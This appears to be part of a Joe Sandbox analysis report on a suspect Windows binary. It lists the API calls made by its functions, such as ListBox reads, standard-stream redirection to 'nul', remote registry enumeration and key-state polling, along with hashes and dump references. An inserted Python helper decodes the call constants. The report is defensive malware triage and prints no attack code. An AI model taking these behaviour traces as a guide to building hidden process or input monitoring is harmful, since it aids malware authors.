                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 1173514356-4108050209
                                                                                                                                                  • Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                                                                                                                  • Instruction ID: 6162d5963bf1ca612739d8e457cf9df7481532cfa70a9704744149088ee17d1e
                                                                                                                                                  • Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                                                                                                                  • Instruction Fuzzy Hash: F141AE70604701AFD720EF29CD44B1BBBE4AF84314F044A2EF96597391E7B8A905CB6B
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                    • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
                                                                                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
                                                                                                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57
                                                                                                                                                    • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$_memmove$ClassName
                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                  • API String ID: 365058703-1403004172
                                                                                                                                                  • Opcode ID: 5775ec906f698195cde3e527aabb6dfe91670bbae6028ffb5bdc1b6155921f6c
                                                                                                                                                  • Instruction ID: 808fcc3072a567dbeea6ba3b2dea5d83030b8b2133ef71414da725dc7de09f99
                                                                                                                                                  • Opcode Fuzzy Hash: 5775ec906f698195cde3e527aabb6dfe91670bbae6028ffb5bdc1b6155921f6c
                                                                                                                                                  • Instruction Fuzzy Hash: 1021F572A00108BEDB14ABA19C45DFF7769DF05324B10462FF825B72E2DE3D180E9A28
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                                                                                    • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                                                                                    • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                                                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
                                                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00486468
                                                                                                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0048647D
                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00486485
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                  • String ID: SysAnimate32
                                                                                                                                                  • API String ID: 4146253029-1011021900
                                                                                                                                                  • Opcode ID: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                                                                                                                  • Instruction ID: 96a79e02294e314170444e54cb88eb83d8519b29eeb49143b64c907e724dd28e
                                                                                                                                                  • Opcode Fuzzy Hash: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                                                                                                                  • Instruction Fuzzy Hash: 2C219571110205BFEF506F64DC40EBF37ADEF54724F114A2AF91492190D739DC41A768
                                                                                                                                                  APIs
                                                                                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00466DBC
                                                                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466DEF
                                                                                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00466E01
                                                                                                                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00466E3B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateHandle$FilePipe
                                                                                                                                                  • String ID: nul
                                                                                                                                                  • API String ID: 4209266947-2873401336
                                                                                                                                                  • Opcode ID: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                                                                                                                                  • Instruction ID: cca2de9678abd998f0cd8c5114a45f7ff5fc269ace22cdb61a343b4aec1dc2fa
                                                                                                                                                  • Opcode Fuzzy Hash: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                                                                                                                                  • Instruction Fuzzy Hash: 8B219274600209ABDB209F29DC05A9A77F8EF44720F214A2FFCA0D73D0EB759955CB5A
                                                                                                                                                  APIs
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00466E89
                                                                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00466ECC
                                                                                                                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateHandle$FilePipe
                                                                                                                                                  • String ID: nul
                                                                                                                                                  • API String ID: 4209266947-2873401336
                                                                                                                                                  • Opcode ID: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                                                                                                                  • Instruction ID: 3a9fffd2e99ff55030e4788a991c608e9c08d8bb738c80722c17144d2858802a
                                                                                                                                                  • Opcode Fuzzy Hash: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                                                                                                                  • Instruction Fuzzy Hash: 7B21C7795003059BDB209F69CC04A9B77A8EF44724F210B1EFCA0D33D0E7759851C75A
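The function records above carry their evidence as raw hex arguments: the three SendMessageW calls with 0x188/0x18A/0x189 (LB_GETCURSEL, LB_GETTEXTLEN, LB_GETTEXT: read the selected ListBox item's text), the SysAnimate32 record with 0x467 (ACM_OPENW), and the two records that pair GetStdHandle and CreatePipe with CreateFileW on the `nul` device, which is how a parent silences a child's standard streams. The following Python is an added triage helper, not Joe Sandbox code and not part of this report: it parses the `• Api.MODULE(args), ref: ADDR` lines into records and resolves the constants with standard Win32 values. The sample input is constructed from lines quoted from the records above. One labelled assumption: the report prints GetStdHandle's argument as 000000F6, which this helper reads as the low byte of (DWORD)-10, i.e. STD_INPUT_HANDLE.

```python
"""Added example: parse Joe Sandbox per-function 'APIs' listings and resolve
the raw Win32 constants they contain. Hypothetical helper, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed input: API lines copied from four of the function records above.
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
  • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
• SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57
APIs
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
• LoadLibraryW.KERNEL32(?), ref: 00486468
• DestroyWindow.USER32(?), ref: 00486485
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00466E89
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
• CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0046AC54
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
• __swprintf.LIBCMT ref: 0046ACC1
"""

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")   # the report zero-pads numeric args to 8 digits

# Standard Win32 values for the calls seen in the records above.
WINDOW_MESSAGES = {0x0030: "WM_SETFONT", 0x0188: "LB_GETCURSEL",
                   0x0189: "LB_GETTEXT", 0x018A: "LB_GETTEXTLEN",
                   0x0467: "ACM_OPENW"}            # WM_USER + 103
# Assumption: GetStdHandle takes (DWORD)-10/-11/-12 and the report shows only
# the low byte (000000F6), so resolution keys on that byte.
STD_HANDLES = {0xF6: "STD_INPUT_HANDLE", 0xF5: "STD_OUTPUT_HANDLE",
               0xF4: "STD_ERROR_HANDLE"}
ACCESS_MASKS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[object]               # int for hex literals, str for '?' or text
    ref: int
    subcall: Optional[int] = None    # set when the line is "Part of subcall function"


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)


def parse_arg(tok: str):
    tok = tok.strip()
    return int(tok, 16) if HEX32.match(tok) else tok


def parse_records(text: str) -> List[FunctionRecord]:
    """One FunctionRecord per 'APIs' heading; unparseable lines are skipped."""
    records: List[FunctionRecord] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            records.append(FunctionRecord())
            continue
        m = API_LINE.match(line)
        if not m or not records:
            continue
        args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
        records[-1].calls.append(ApiCall(
            m["api"], m["mod"], args, int(m["ref"], 16),
            int(m["sub"], 16) if m["sub"] else None))
    return records


def resolve(call: ApiCall) -> str:
    """Name the constant that gives this call its meaning, or '' if none applies."""
    a = call.args
    if call.api == "SendMessageW" and len(a) > 1 and isinstance(a[1], int):
        return WINDOW_MESSAGES.get(a[1], f"msg 0x{a[1]:X}")
    if call.api == "GetStdHandle" and a and isinstance(a[0], int):
        return STD_HANDLES.get(a[0] & 0xFF, f"0x{a[0]:X}")
    if call.api == "CreateFileW" and len(a) > 1 and isinstance(a[1], int):
        return f"{a[0]}:{ACCESS_MASKS.get(a[1], hex(a[1]))}"
    return ""


def describe(rec: FunctionRecord) -> List[str]:
    """One readable line per direct (non-subcall) API call in the record."""
    out = []
    for c in rec.calls:
        if c.subcall is None:
            tag = resolve(c)
            out.append(f"{c.api}({tag}) @{c.ref:08X}" if tag else f"{c.api} @{c.ref:08X}")
    return out


def redirects_std_to_nul(rec: FunctionRecord) -> bool:
    """True when the record opens the 'nul' device and also fetches a std handle."""
    opens_nul = any(c.api == "CreateFileW" and c.args and c.args[0] == "nul"
                    for c in rec.calls)
    return opens_nul and any(c.api == "GetStdHandle" for c in rec.calls)


if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE_REPORT)):
        print(f"record {i}: nul-redirect={redirects_std_to_nul(rec)}")
        for line in describe(rec):
            print("  ", line)
```

Only the message, std-handle and access-mask arguments are resolved; other arguments (the 0000000C values in the CreatePipe and CreateFileW lines, for instance) are left as the report printed them rather than guessed at.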
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0046AC54
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
• __swprintf.LIBCMT ref: 0046ACC1
• SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046ACFF
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu
• API String ID: 3164766367-685833217
• Opcode ID: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
• Instruction ID: 026ba00fef41ead7d753cb67677e2cef5533d5e87c35db631ff5a0b10e4673a5
• Opcode Fuzzy Hash: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
• Instruction Fuzzy Hash: FE217470600109AFCB10EF65C945DAE77B8EF49318B10447EF905AB252DA35EE55CB25
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046115F
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 00461184
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046118E
• Sleep.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 004611C1
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: CounterPerformanceQuerySleep
                                                                                                                                                  • String ID: @F
                                                                                                                                                  • API String ID: 2875609808-2781531706
                                                                                                                                                  • Opcode ID: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                                                                                                                  • Instruction ID: bb6757969e877831e55d7075b4886ee1e071d58b2ed1133263d880316bc49dff
                                                                                                                                                  • Opcode Fuzzy Hash: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                                                                                                                  • Instruction Fuzzy Hash: B5113071D0051DD7CF00DFA5D9486EEBB78FF0E711F04446ADA41B2250DB789954CB9A
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00AB3F73,00000003,?,00AB3F13,00000003,00ACDE80,0000000C,00AB403D,00000003,00000002), ref: 00AB3FE2
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AB3FF5
• FreeLibrary.KERNEL32(00000000,?,?,?,00AB3F73,00000003,?,00AB3F13,00000003,00ACDE80,0000000C,00AB403D,00000003,00000002,00000000), ref: 00AB4018
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a70000_x.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 708e49359d112647e9006b2596631d1b31e114d468a6834158fd44bc0e2f1ee5
• Instruction ID: fe32a61057fda39284c15338cf40d7153eefe9a7317f008a6c46c6b9947e3d89
• Opcode Fuzzy Hash: 708e49359d112647e9006b2596631d1b31e114d468a6834158fd44bc0e2f1ee5
• Instruction Fuzzy Hash: 24F0443090121CBBCB11DF95DC0ABDDBFB9EB18751F000158F805A2262DB755A45DA91
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
• CloseHandle.KERNEL32(?), ref: 0047EDEB
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Process$CloseCountersHandleInfoMemoryOpen
• String ID:
• API String ID: 2364364464-0
• Opcode ID: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
• Instruction ID: fffec5fe55f17e3d6af6322d033c5a61601868e7b6c72126a0bd4eac84abd099
• Opcode Fuzzy Hash: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
• Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49
APIs
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
  • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048013C
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
• RegCloseKey.ADVAPI32(?,?), ref: 004801AF
• RegCloseKey.ADVAPI32(00000000), ref: 004801BC
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
• String ID:
• API String ID: 3440857362-0
• Opcode ID: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
• Instruction ID: 88ea7daa6ea56d794f8f44f15d5cebce8ee28ea1eb3ac59e56a3faba9080710b
• Opcode Fuzzy Hash: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
• Instruction Fuzzy Hash: 00517E71214204AFC704EF54C885E6FB7E8FF84318F40492EF595972A2DB39E909CB56
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E61F
• GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E648
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E687
  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
  • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E6AC
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E6B4
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
• String ID:
• API String ID: 1389676194-0
• Opcode ID: 8f2ae4a4443c6bc7a9da2abdf3aecd68817ef5b13d258d4547a7daef5705853c
• Instruction ID: 91bc9b0f2d422c2787d2346e32f4aa496c052f5f6ad9ddd010e4038a96899c27
• Opcode Fuzzy Hash: 8f2ae4a4443c6bc7a9da2abdf3aecd68817ef5b13d258d4547a7daef5705853c
• Instruction Fuzzy Hash: 21514D75A00105DFCB01EF65C981AAEBBF5EF09314F1480AAE809AB3A2DB35ED11CF55
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
• Instruction ID: 1d009f8157befd3e54c409f5ed609bf9f47d87f5e0fd5ad8ffda0b3aa488663e
• Opcode Fuzzy Hash: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
• Instruction Fuzzy Hash: A1419435904114ABE710FF24CC4CFAEBBA4EB09310F144A67E815A73E1C7B8AD65D75A
APIs
• GetCursorPos.USER32(?), ref: 00402357
• ScreenToClient.USER32(004C57B0,?), ref: 00402374
• GetAsyncKeyState.USER32(00000001), ref: 00402399
• GetAsyncKeyState.USER32(00000002), ref: 004023A7
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
• Opcode ID: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
• Instruction ID: 839f7de4dd1eaa7d0d5dffd0863558e2d4fc2f6d206a63eef28a724dc464cb27
• Opcode Fuzzy Hash: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
• Instruction Fuzzy Hash: EB416135504115FBCF199FA9C848AEEBB74FB09364F20432BE825A22D0C7789D54DB95
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004563E7
• TranslateAcceleratorW.USER32(?,?,?), ref: 00456433
• TranslateMessage.USER32(?), ref: 0045645C
• DispatchMessageW.USER32(?), ref: 00456466
